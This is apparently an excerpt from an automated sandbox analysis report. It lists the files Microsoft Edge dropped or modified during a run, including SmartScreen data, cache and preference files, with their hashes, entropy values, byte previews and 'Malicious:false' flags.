                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):47
                                                                                                                                                                                                                                                Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):81
                                                                                                                                                                                                                                                Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):130439
                                                                                                                                                                                                                                                Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):57
                                                                                                                                                                                                                                                Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):575056
                                                                                                                                                                                                                                                Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):460992
                                                                                                                                                                                                                                                Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9
                                                                                                                                                                                                                                                Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:uriCache_

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                Entropy (8bit):5.024935856616373
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclR1TVQ6Y:YWLSGTt1o9LuLgfGBPAzkVj/T8lvVQ6Y
                                                                                                                                                                                                                                                MD5:B9AD8915652D5E2E171FB7E8B703A583
                                                                                                                                                                                                                                                SHA1:F6ED2D1323634B765B56EA8CC595BB5C177774A6
                                                                                                                                                                                                                                                SHA-256:32693FD55F727AF39595B766522C559CCDB0D4C94651429065BAFE1F9D55C127
                                                                                                                                                                                                                                                SHA-512:A782D9970A4B31A5789AE7AF85F0C21D924C3BB3B3CEAC142392F4E3E789ADA7C845C3E15660D15EDF7DD1F9E724CB257B74F6B3BABA42AD55E82E8971172D9A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1734466051977508}]}

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):86
                                                                                                                                                                                                                                                Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a8e7a13a-dd78-4fd5-ad89-a6e9e425d799.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                Entropy (8bit):6.0895545630243495
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kdTKKGf4SitBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:C4D1B965968C17D24E4076A6A1C93333
                                                                                                                                                                                                                                                SHA1:779982352E22721CCDD99A03CA7B919D6180DB31
                                                                                                                                                                                                                                                SHA-256:8B4FE95B4A247F27AC66BF59C52B360DF1BCC7F37769664282F4FAA488BC52DA
                                                                                                                                                                                                                                                SHA-512:73A7F6734787B1763E146C863AA776F74861EBCB5A9FEDB11C0BC8228475F6CA63495D5BB64CF08572FC3186E9A72E967266560B940048DB9965E64B08C6C249
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b2969262-038c-46c0-985f-f40b81bd84bf.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):45862
                                                                                                                                                                                                                                                Entropy (8bit):6.086781055868148
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:KMkbJrT8IeQc5day2KKGf4oBauetCPjU7xPQ2CioG7DRo+yM/42cRaLMos79:KMk1rT8H1aas1FoG7VLyMV/YosR
                                                                                                                                                                                                                                                MD5:0F3E8864A37C31DA6055B14DE10F6724
                                                                                                                                                                                                                                                SHA1:2C394661D27E3EDC173CDE74538131E7141BCE98
                                                                                                                                                                                                                                                SHA-256:FC1791B215777677326B30D11706BEBE3FF10A8240C2B23C3898772748642F9A
                                                                                                                                                                                                                                                SHA-512:8EDDB610F773393EE7AFBF20F9FD139BAB39EA63C641D5DC9D0A6A1BA3344DA24CF1FCF9E210587B5E7E209970544CDAADDF4AAD14DC334DEB532539CFA1FAEF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"cac4bf85-0420-4f2d-9460-404987ed9f05"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734365252"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c495a952-da83-4376-8e32-2da90ff6db45.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):45909
                                                                                                                                                                                                                                                Entropy (8bit):6.086511297531517
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:KMkbJrT8IeQc5daX2KKGf4oBauetCPjU7xPQ2CioG7DRo+yM/42cRaLMos79:KMk1rT8H1ahs1FoG7VLyMV/YosR
                                                                                                                                                                                                                                                MD5:2C906FD2872754528EDA500ABA847671
                                                                                                                                                                                                                                                SHA1:C3D5EBB841869B548230297374CC8C90AF4F0FCC
                                                                                                                                                                                                                                                SHA-256:618AA79097C7D94AEEA4B3E2E1757C976698BDB5E5ED8641F04936FDA93010E5
                                                                                                                                                                                                                                                SHA-512:797EBBD39C6BC85CE22E03588FA5556F218C20F62205000D3B4DBFE80381C5AD84261C67E5E2954125346888A0BFA19725E7520211AB88B40A8533FA92B4188F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"cac4bf85-0420-4f2d-9460-404987ed9f05"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734365252"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d56748fb-8c6f-44c3-a856-d0286c6ea0db.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):45986
                                                                                                                                                                                                                                                Entropy (8bit):6.086445397258186
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:KMkbJrT8IeQc5maX2KKGf4oYauetCPjU7xPQ2CioG7DRo+yM/42cRaLMos79:KMk1rT8H+ass1FoG7VLyMV/YosR
                                                                                                                                                                                                                                                MD5:D2AD5D749BFCFEDB9FF8F3C9C68872F0
